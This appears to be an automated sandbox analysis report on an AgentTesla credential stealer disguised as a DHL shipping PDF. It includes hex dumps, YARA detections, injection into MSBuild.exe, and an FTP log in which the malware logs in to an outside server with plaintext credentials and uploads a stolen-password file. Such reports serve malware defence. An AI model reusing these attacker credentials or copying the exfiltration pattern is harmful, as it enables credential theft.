                                                        2024-08-02 13:02:12 UTC680INData Raw: 35 82 48 df d1 b7 68 af c0 60 cf f8 b7 0f 00 d0 61 e0 2f 64 7b 80 c0 28 7f df 50 b7 68 af 80 60 cf f8 77 8f 00 d0 df e0 2f 64 7b 80 c0 28 77 df 50 b7 68 af 80 60 cf f8 77 8f 00 d0 c0 e0 2f 64 a7 9f 5a d8 77 05 71 11 7a 01 81 79 f3 14 1e 49 d2 9e bf 70 1b 80 89 29 f4 53 6f 68 5d 93 8d d7 dc 62 98 52 4f 5d d5 1b bf b9 0b 74 00 de b6 24 92 6e 3c ed 85 a3 e1 58 ac f8 77 8f 00 d0 df e0 29 ee 7b 80 31 29 75 df 28 d1 34 da 80 60 cf f8 77 8f 00 d0 90 e0 1f 66 c6 90 26 28 77 f3 d1 b7 68 ae 80 60 cf f8 77 8f cf 42 d4 e0 2f 74 7b 80 c0 2e 75 df 50 b7 64 af 80 62 cf f8 77 9f 00 d0 dc e0 2f 64 7b 80 c0 28 f7 df 50 b7 68 af 80 60 cf f8 76 8f 00 d2 df e0 2f 64 7b 80 c2 28 7f e4 50 b7 58 af 80 64 cf f8 77 8f 01 d0 df 10 2f 64 7b 80 c0 28 4f df 50 b7 68 af 80 60 cf f8 77
                                                        Data Ascii: 5Hh`a/d{(Ph`w/d{(wPh`w/dZwqzyIp)Soh]bRO]t$n<Xw){1)u(4`wf&(wh`wB/t{.uPdbw/d{(Ph`v/d{(PXdw/d{(OPh`w
                                                        2024-08-02 13:02:12 UTC1369INData Raw: ec 57 e4 72 7f aa 27 9f 8d f5 7c 81 d5 36 bd 9d 3e 1b da 92 e5 0e 0c 74 5b e4 6d 57 81 0b 94 a7 dc 43 1e 7f 04 43 fe bc 8c bf 73 8d 71 21 88 52 e2 36 cd f5 f5 d0 5c 1b 71 f4 b2 af 00 d0 df e0 ed 46 fd e9 ed 76 f3 f5 7d bb 17 59 e9 30 c7 f0 2e 9c c3 ab ad 08 cb 99 1f 89 48 fc 1b fe 80 11 ad af 80 60 9c f8 77 8f c9 d0 df e0 6d 64 7b 80 d7 28 77 df 83 b7 68 af 1c 60 cf f8 bd 8f 00 d0 47 e0 2f 64 80 80 c0 28 7f df 50 b7 c7 af 80 60 a2 f8 77 8f d6 d0 df e0 3c 64 7b 80 4b 28 77 df d3 e7 9b a7 12 b6 81 56 3a f5 ff d0 df e0 2f 64 1e 10 cd 34 09 66 4b 2c dd 57 5e 2e 32 b5 e7 93 d1 67 47 3d 1d 2c 13 07 7e 62 e9 aa cf 85 ea 54 b2 24 9e a9 3b 7f 46 cf 59 a5 08 63 1a 3a 31 90 cd b1 fd 9f 7b 9b b4 28 c0 f2 76 a0 08 d7 dc ec 30 ae a7 da 47 08 c4 20 d0 af e8 a2 40 28 cc
                                                        Data Ascii: Wr'|6>t[mWCCsq!R6\qFv}Y0.H`wmd{(wh`G/d(P`w<d{K(wV:/d4fK,W^.2gG=,~bT$;FYc:1{(v0G @(
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 30 d0 cf ae 74 80 60 cc 0e ec 9f 82 b6 df e0 10 65 e8 ee 61 28 50 3c 1f b7 68 aa 68 42 c8 5f 03 8f 00 d1 b9 94 1f 67 39 ad c0 28 f7 32 e6 d4 38 b3 a5 60 cf e4 49 2c bc d4 df e2 22 10 7b 80 22 2a c8 df 50 af b9 b3 a5 60 cf e4 49 2c a2 d4 df e2 22 10 7b 80 22 2a ca df 50 af 05 99 40 6a 24 f8 77 98 08 9a f8 1b 2f 42 4f 14 c0 28 f6 32 98 8f 2f 76 80 60 cc 0e 4c 9f 18 5d 2e e0 2f e4 cf ca c2 14 4d df 50 80 69 38 cb 22 cf 45 cf 29 00 d0 da 95 0c 65 d9 a3 c0 28 f7 32 d8 8f 6b 33 b2 60 cf fc cc 58 08 08 34 e0 2f 15 fb 29 a4 25 77 7e 78 63 68 af 20 5a 2b f4 ba ea 00 d0 dc 95 1c 65 fa 37 6c 28 77 d8 f8 81 69 ee 51 60 cf f6 74 5d d7 f2 df 70 22 47 7b 80 c3 94 ae d0 e3 44 68 af c0 5a a8 f4 72 67 2b d0 df e2 12 1d fb 42 a6 28 77 d2 d0 8b ce e4 80 67 ae 6b 77 8f 0c 0a
                                                        Data Ascii: 0t`ea(P<hhB_g9(28`I,"{"*P`I,"{"*P@j$w/BO(2/v`L]./MPi8"E)e(2k3`X4/)%w~xch Z+e7l(wiQ`t]p"G{DhZrg+B(wgkw
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 7d 9d cf f8 76 99 88 d2 d4 7b e5 64 7b 84 12 c4 76 6b ee b7 68 ac 68 52 c8 ec b9 3a 00 d0 dc 95 0c 65 d9 fb c0 28 f7 32 d8 8f 6b 33 77 60 cf fc cc 58 08 08 34 e0 2f 15 fb 39 ad 29 77 d2 78 12 6a af 20 5a e9 f4 cf bc 00 d0 d9 e4 22 f3 7a 80 22 4b e4 df 50 af 05 44 40 6a 24 f8 77 98 08 d6 be 2e 6f 64 87 88 c1 14 24 c0 50 9f 69 a2 a8 dd c0 f8 75 9f 0e d1 be 2b 6f 64 87 88 23 69 1f 8f 51 b7 e9 a8 10 48 ae 64 70 8f 0c 0a 3b e4 57 f9 7b 80 c1 94 6e d0 d1 e7 f1 af 80 70 a9 f0 74 7b ec d0 df e2 12 75 fb 98 4d e1 77 df 30 82 b9 a8 7d ab cf f8 76 99 88 d2 d4 7b c3 64 7b 84 12 c4 76 6b 7e b7 68 ac 68 52 c8 ec b9 29 00 d0 dc 95 0c 65 d9 0a c0 28 f7 32 d8 8f 6b 33 af 60 cf fc cc 96 08 5e 95 e0 2f e4 cf 48 c2 a9 b2 4a 50 b7 e8 e9 04 50 c4 50 b4 8f 00 d1 d8 e2 77 27 7b
                                                        Data Ascii: }v{d{vkhhR:e(2k3w`X4/9)wxj Z"z"KPD@j$w.od$Piu+od#iQHdp;W{npt{uMw0}v{d{vk~hhR)e(2k3`^/HJPPPw'{
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 60 cf 68 70 ab 0a d0 df e0 2f 74 7a 80 c0 28 b5 d6 50 b7 68 27 e0 60 cf 04 f4 8f 00 d0 57 e8 66 e6 7b 80 c0 0c f4 df 50 b7 24 72 01 a0 4f 0e 77 8f 19 88 da e0 ab 64 7b 80 c2 28 77 c1 58 b7 68 af 80 c0 cb f4 77 8b 67 d0 df e0 2f a7 27 88 c0 24 74 df 50 b7 ab a0 b9 dc cf f8 77 37 12 d0 df bf 38 64 7b 8a e0 69 77 df 50 10 c6 af 80 10 47 f1 77 8f ef 31 df e0 2c 64 7b 80 c0 b2 74 df 50 b3 7d 27 e0 60 cf 04 70 8f 00 d0 47 ea 2f 64 07 29 24 28 77 7e c2 e0 68 af 9c 27 22 f8 77 98 a8 57 dd e0 2f 74 fb 80 c0 28 51 c1 50 b7 4c f8 01 78 cf f8 4f bf 00 d0 df 91 04 64 7b 8a 47 d8 74 df 91 e0 6a af 5c 0c cf f8 3f 89 1d d0 df e5 9c a7 27 80 c0 24 f7 df 50 b7 4d 13 80 60 5f 2c b3 84 00 d0 be 11 2f 64 c7 42 20 a8 77 d4 58 8f 68 af 80 c0 cb f4 77 8f ef 31 d8 e0 2c 64 7b 80
                                                        Data Ascii: `hp/tz(Ph'`Wf{P$rOwd{(wXhwg/'$tPw78d{iwPGw1,d{tP}'`pG/d)$(w~h'"wW/t(QPLxOd{Gtj\?'$PM`_,/dB wXhw1,d{
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 00 d0 40 91 44 64 7b 8a ea c9 8f d8 50 b4 e8 af 80 60 58 5c 77 8f c1 fa 57 e3 3f 64 4f 83 c0 28 0e 3c 70 b7 68 aa 01 78 c0 f8 db b1 00 d0 d9 90 6f 64 7b 80 2d 0d 77 df 51 57 99 aa 80 c0 cd f2 77 75 92 d0 df e5 22 35 7b 80 22 14 f5 d0 50 9f ab ad 81 60 97 0e 77 8f 0a f3 57 e3 2f 64 a9 5a c0 28 0e 32 51 b0 68 af 40 60 07 f8 af 92 10 b0 df e0 2f 64 e6 41 c1 28 5e c8 50 b7 ea af 80 14 af f8 77 8f 00 57 db ec 2f 2c 67 98 c0 28 77 4f 08 cf 68 ef 60 60 cf f8 b3 af 93 70 df e0 2f a7 27 90 c0 24 0f df 50 b7 4d 4f 80 60 5f 2c 4f b8 00 d0 df 6f 08 67 7b 80 47 58 75 df 58 af 68 af 80 c0 c0 17 8f 8f 00 d0 57 e3 6f 64 77 88 c0 28 77 71 c0 b7 68 3f 4a 62 c2 f8 77 8f ef 33 d4 e0 2f a7 27 98 c0 24 f4 df 50 b7 ab a0 b9 6c cf f8 77 37 06 d4 df 90 5f 64 7b 80 10 54 77 df f0
                                                        Data Ascii: @Dd{P`X\wW?dO(<phxod{-wQWwu"5{"P`wW/dZ(2Qh@`/dA(^PwW/,g(wOh``p/'$PMO`_,Oog{GXuXhWodw(wqh?Jbw3/'$Plw7_d{Tw
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 64 7b 1f 21 a9 77 3f 49 b7 68 af 01 10 61 f3 77 8f 00 57 dd e8 2f 0c 57 80 c0 98 b5 d6 50 b7 78 68 80 60 cf 68 f5 bf 00 d0 57 e3 5f 64 77 89 c0 28 77 4f 51 fa 5b af 80 60 5b fa 77 8f 04 4c 21 e8 2f 64 77 99 c0 28 77 4f 88 cf 68 af 01 78 c4 f8 4f bc 00 d0 df 6f 6f 2e 0e 80 c0 28 b5 da 50 b7 4d f6 81 60 5f 48 73 8f 00 d1 44 19 1f 64 68 42 65 28 77 d2 91 90 68 af 88 74 cf f8 77 37 0e d6 df e0 8f 94 fa 80 e0 18 77 df 50 57 6a 11 b0 60 cf f8 b3 84 10 d0 bf e6 2f 64 7b 29 24 28 77 7e da b4 1a af 80 60 47 f1 72 8f 00 57 dd ec 2f 74 c7 80 c0 28 b5 c0 65 b8 68 af 80 c0 cd e4 77 8e 02 d0 df e0 1b b6 fb 80 88 a6 6f ca 50 b7 68 27 10 30 cf f8 b3 84 18 d0 bf e8 2f 64 7b 1f c4 0d cd df 50 b7 78 a7 80 60 cf d1 29 8f 00 d4 57 e7 6f 64 77 88 c0 28 77 4f 88 cf 68 af 01 78
                                                        Data Ascii: d{!w?IhawW/WPxh`hW_dw(wOQ[`[wL!/dw(wOhxOoo.(PM`_HsDdhBe(whtw7wPWj`/d{)$(w~`GrW/t(ehwoPh'0/d{Px`)Wodw(wOhx
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 66 80 c0 68 51 a5 d0 b7 4c ee 59 60 cf f6 7f 9c 00 d0 dc 74 79 65 7b 21 10 b5 77 df f0 77 5b af 80 70 58 93 74 8f c1 08 74 e0 2f 15 78 85 c0 28 f7 d5 52 e8 68 af c0 57 cf ec 77 4d 82 89 df e0 10 62 97 80 c0 68 51 df d1 b7 4c ee d8 60 cf f6 7f b2 00 d0 dc 74 00 67 7b 21 10 74 77 df f0 77 38 af 80 70 58 f6 72 8f c1 d8 31 e0 2f e4 e8 47 c6 28 50 ff e8 b7 68 ac 5c 53 c4 f8 3f cf 1b d0 df e2 1b de fb 80 88 14 5d df 50 80 6c 6d 80 60 cc 4d 19 9f 00 98 be 5c 2f 64 c7 a0 65 28 77 d8 c2 c9 69 af 9c e0 2b f8 77 80 c9 ae d8 e0 2b 62 b6 80 c0 68 51 7d d1 b7 4c bf 88 60 cf fc 3c c8 18 d0 40 f0 6c 64 7b 84 8a 7a 75 df 42 77 79 af 80 70 58 c6 72 8f c1 d8 b4 e0 2f e4 cf 80 a6 34 f7 df c9 9f 68 af 21 60 cf e5 4f 8f 00 d0 df 6f 08 94 7b 43 41 69 77 df 50 57 98 ad 80 62 c9
                                                        Data Ascii: fhQLY`tye{!ww[pXtt/x(RhWwMbhQL`tg{!tww8pXr1/G(Ph\S?]Plm`M\/de(wi+w+bhQ}L`<@ld{zuBwypXr/4h!`Oo{CAiwPWb
                                                        2024-08-02 13:02:12 UTC1369INData Raw: d6 08 b7 68 27 e0 78 cf 04 0f 8f 00 d0 57 e8 66 37 7b 80 c0 c9 8f d8 50 bc 26 af 80 58 dd 8c 77 8f 10 57 db e0 2f 74 66 80 c0 28 b5 d6 08 b7 68 27 e0 78 cf 04 08 8f 00 d0 57 e8 66 95 7b 80 c0 0c 21 c0 50 b7 78 68 80 60 cf 68 f5 84 00 d0 57 e3 30 64 77 98 c0 28 77 4f 51 fa 39 af 80 60 47 fe 74 8f ef 31 d0 e0 4b 6f 7b 80 22 c9 8e c8 50 b4 e8 af 80 60 47 f1 f6 8f 00 57 dd e3 2f 74 e6 80 c0 28 b5 c0 65 90 68 af 80 6e 2f e4 77 8f 80 b1 df e0 2f a7 a7 86 c0 28 b5 da 08 b7 78 e0 80 60 cf 68 70 ab 0d d0 df e0 8f 94 46 80 0f 6c 77 df f0 57 99 af 80 62 a8 f8 77 8f ef 33 dd e0 2f a7 27 86 c0 24 8c df 50 b7 ab a0 b9 44 cf f8 77 8b 6a d0 df e0 2c 95 7b 80 c0 c9 8e da 50 b7 ab ad e0 60 af e2 77 8f 00 57 d0 59 04 64 7b 80 47 58 75 df 78 ee 68 af 60 c0 cb f6 77 8e 0c d0
                                                        Data Ascii: h'xWf7{P&XwW/tf(h'xWf{!Pxh`hW0dw(wOQ9`Gt1Ko{"P`GW/t(ehn/w/(x`hpFlwWbw3/'$PDwj,{P`wWYd{GXuxh`w
                                                        2024-08-02 13:02:12 UTC1369INData Raw: 01 10 61 f6 77 8f 00 d0 bf e8 2f 64 7b 1f 23 a9 77 df 91 a0 6b af 88 48 cf f8 77 37 10 4c d2 e0 2f 64 5f 94 c0 28 77 3d a1 57 a8 2f 68 60 cf f8 0a 8d 18 d0 31 e8 2f 64 c7 80 c0 39 6f df 50 b7 68 27 10 30 cf 07 71 af 00 d0 df 6f 30 67 7b 40 c1 28 77 df 91 f7 26 e4 80 60 cf 68 f0 8f 00 59 80 e0 2f e4 ba 86 c2 28 b5 da 51 b7 04 a4 80 60 a5 68 f5 8f 00 f0 d2 e0 2f 64 ba 8e c6 28 77 4f 08 cf 68 ef c1 60 cf f8 b3 af 93 b3 df e0 2f a7 27 80 c0 c9 8f c0 50 b6 39 af 80 60 af f2 77 8f 00 57 db ec 2f 64 ba 86 c6 28 6f d0 50 b7 68 27 81 1e 20 f8 77 8f ef 31 df e0 8f 95 7a 80 e0 a9 77 df 50 57 99 a4 80 60 47 fe 72 8f 80 d4 df e0 2f a7 7a 53 a3 28 77 df 91 ff 68 af 7d 63 cf f8 76 37 0e d0 df 90 1f 64 7b 80 47 d8 75 df 50 57 98 a4 80 62 c4 f8 77 8f ef d4 71 1f 2f 64 7b
                                                        Data Ascii: aw/d{#wkHw7L/d_(w=W/h`1/d9oPh'0qo0g{@(w&`hY/(Q`h/d(wOh`/'P9`wW/d(oPh' w1zwPW`Gr/zS(wh}cv7d{GuPWbwq/d{


                                                        FTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Aug 2, 2024 15:02:15.256807089 CEST2149708108.179.234.136192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server.
                                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                        Aug 2, 2024 15:02:15.257108927 CEST4970821192.168.2.9108.179.234.136USER pop@wapination.net
                                                        Aug 2, 2024 15:02:15.372625113 CEST2149708108.179.234.136192.168.2.9331 User pop@wapination.net OK. Password required
                                                        Aug 2, 2024 15:02:15.372781038 CEST4970821192.168.2.9108.179.234.136PASS sync@#1235
                                                        Aug 2, 2024 15:02:15.577150106 CEST2149708108.179.234.136192.168.2.9230 OK. Current restricted directory is /
                                                        Aug 2, 2024 15:02:15.696149111 CEST2149708108.179.234.136192.168.2.9504 Unknown command
                                                        Aug 2, 2024 15:02:15.696368933 CEST4970821192.168.2.9108.179.234.136PWD
                                                        Aug 2, 2024 15:02:15.813287020 CEST2149708108.179.234.136192.168.2.9257 "/" is your current location
                                                        Aug 2, 2024 15:02:15.813568115 CEST4970821192.168.2.9108.179.234.136TYPE I
                                                        Aug 2, 2024 15:02:15.929900885 CEST2149708108.179.234.136192.168.2.9200 TYPE is now 8-bit binary
                                                        Aug 2, 2024 15:02:15.932024002 CEST4970821192.168.2.9108.179.234.136PASV
                                                        Aug 2, 2024 15:02:16.068078041 CEST2149708108.179.234.136192.168.2.9227 Entering Passive Mode (108,179,234,136,186,192)
                                                        Aug 2, 2024 15:02:16.074553967 CEST4970821192.168.2.9108.179.234.136STOR PW_user-760639_2024_08_02_09_02_13.html
                                                        Aug 2, 2024 15:02:16.545480013 CEST2149708108.179.234.136192.168.2.9150 Accepted data connection
                                                        Aug 2, 2024 15:02:16.680628061 CEST2149708108.179.234.136192.168.2.9226-File successfully transferred
                                                        226-File successfully transferred226 0.121 seconds (measured here), 2.56 Kbytes per second

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:1
                                                        Start time:09:02:04
                                                        Start date:02/08/2024
                                                        Path:C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe"
                                                        Imagebase:0xfd0000
                                                        File size:92'672 bytes
                                                        MD5 hash:C9BEC29F669D714CD80E368748D7024C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:09:02:11
                                                        Start date:02/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        Imagebase:0x9d0000
                                                        File size:262'432 bytes
                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:20.8%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:7.7%
                                                          Total number of Nodes:39
                                                          Total number of Limit Nodes:0

                                                          Executed Functions

                                                          Function 00007FF886E32072 Relevance: 1.7, APIs: 1, Instructions: 198filenetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 7ff886e32072-7ff886e32fc5 242 7ff886e32fee-7ff886e3307b InternetReadFile 238->242 243 7ff886e32fc7-7ff886e32feb 238->243 244 7ff886e3307d 242->244 245 7ff886e33083-7ff886e330e3 242->245 243->242 244->245
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: FileInternetRead
                                                          • String ID:
                                                          • API String ID: 778332206-0
                                                          • Opcode ID: d178f1f45d25ff763a926a7ffb79fcc9151437d541da0d6ba542ba5baeb677a2
                                                          • Instruction ID: 85a8edc89dd699e58732e19e0422089c7e551688ed879dbd6f49d3e8cbaf2c52
                                                          • Opcode Fuzzy Hash: d178f1f45d25ff763a926a7ffb79fcc9151437d541da0d6ba542ba5baeb677a2
                                                          • Instruction Fuzzy Hash: 8D51097091861D8FDB58DF98C885BE9BBF0FB69311F1041AED049A3251DB74A985CF81
                                                          Function 00007FF886E38AFA Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 684injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID: M_^
                                                          • API String ID: 3559483778-921959145
                                                          • Opcode ID: 513f8199032f306718f29f4c6decc7972a4b0a4c0aed808f2ca4bb3461967da5
                                                          • Instruction ID: f0036010967d606b6c9d63b275175b7fc27797cc30f6602135665347070f0af2
                                                          • Opcode Fuzzy Hash: 513f8199032f306718f29f4c6decc7972a4b0a4c0aed808f2ca4bb3461967da5
                                                          • Instruction Fuzzy Hash: 8D610570908A5D8FDB94DFA8C884BE9BBF1FB69311F1081AAD04DE7252DB349985CF41
                                                          Function 00007FF886E38AF8 Relevance: 2.2, APIs: 1, Instructions: 685injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 5f5505279883e4ff900c02cb3a1c79ee4f05323c2597308606cb20085005d6a3
                                                          • Instruction ID: 94a0d403c97e349c9be29a93830f25334dbea8dd43cca35f83599fd9fcbc4c8f
                                                          • Opcode Fuzzy Hash: 5f5505279883e4ff900c02cb3a1c79ee4f05323c2597308606cb20085005d6a3
                                                          • Instruction Fuzzy Hash: D4611570908A5D8FDB94DFA8C884BE9BBF1FB69311F1081AAD04CE7252CB349984CF41
                                                          Function 00007FF886E37F6D Relevance: 2.0, APIs: 1, Instructions: 522processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 9e7cdc5f5be263210b2b518375c01af60bfefc8596612be5a5ef3ae660e4679e
                                                          • Instruction ID: 91b1de2d512b4e39d72f4be3460a58c479127c72798661e3d0588294fd17a217
                                                          • Opcode Fuzzy Hash: 9e7cdc5f5be263210b2b518375c01af60bfefc8596612be5a5ef3ae660e4679e
                                                          • Instruction Fuzzy Hash: E8027030918A8E8FDBB4DF28C855BE977E1FF59351F10012AD84ECB291DB749A45CB41
                                                          Function 00007FF886E32A69 Relevance: 1.8, APIs: 1, Instructions: 258networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 176 7ff886e32a69-7ff886e32b2e 179 7ff886e32b4a-7ff886e32b66 176->179 180 7ff886e32b30-7ff886e32b47 176->180 181 7ff886e32b68-7ff886e32b7f 179->181 182 7ff886e32b82-7ff886e32b92 179->182 180->179 181->182 183 7ff886e32bae-7ff886e32c3b InternetOpenW 182->183 184 7ff886e32b94-7ff886e32bab 182->184 185 7ff886e32c3d 183->185 186 7ff886e32c43-7ff886e32cbb 183->186 184->183 185->186
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 3d452bb6335920c828964be50640064974a84669566be799e17abd579d27e2d1
                                                          • Instruction ID: 0fd8aa692b9b57abba0a39f79d4ea31cd8824e3e229a0da0c0b16fdcc3a93978
                                                          • Opcode Fuzzy Hash: 3d452bb6335920c828964be50640064974a84669566be799e17abd579d27e2d1
                                                          • Instruction Fuzzy Hash: 38814430908A5D8FDB98DF58C858BE9BBF1FB69311F1001AED04EE3651CB74A981CB40
                                                          Function 00007FF886E32CBD Relevance: 1.7, APIs: 1, Instructions: 249networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 189 7ff886e32cbd-7ff886e32d82 193 7ff886e32d9e-7ff886e32dae 189->193 194 7ff886e32d84-7ff886e32d9b 189->194 195 7ff886e32dca-7ff886e32e76 InternetOpenUrlW 193->195 196 7ff886e32db0-7ff886e32dc7 193->196 194->193 197 7ff886e32e78 195->197 198 7ff886e32e7e-7ff886e32ef8 195->198 196->195 197->198
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 428f4b46801c8e4c1ba6ddface93dde8c0ec81ce7ad05ab2a6eb239708d7aa0d
                                                          • Instruction ID: 66715a75fe2e5f7a8e53ea7fe8519b0afec1e61df49838328e098f81bf0ee9fe
                                                          • Opcode Fuzzy Hash: 428f4b46801c8e4c1ba6ddface93dde8c0ec81ce7ad05ab2a6eb239708d7aa0d
                                                          • Instruction Fuzzy Hash: D3713370908A5D8FDB98DF58C895BE9BBF1FB69311F1001AED04EE3691DB74A980CB41
                                                          Function 00007FF886E32042 Relevance: 1.7, APIs: 1, Instructions: 245networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 201 7ff886e32042-7ff886e32b2e 205 7ff886e32b4a-7ff886e32b66 201->205 206 7ff886e32b30-7ff886e32b47 201->206 207 7ff886e32b68-7ff886e32b7f 205->207 208 7ff886e32b82-7ff886e32b92 205->208 206->205 207->208 209 7ff886e32bae-7ff886e32c3b InternetOpenW 208->209 210 7ff886e32b94-7ff886e32bab 208->210 211 7ff886e32c3d 209->211 212 7ff886e32c43-7ff886e32cbb 209->212 210->209 211->212
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
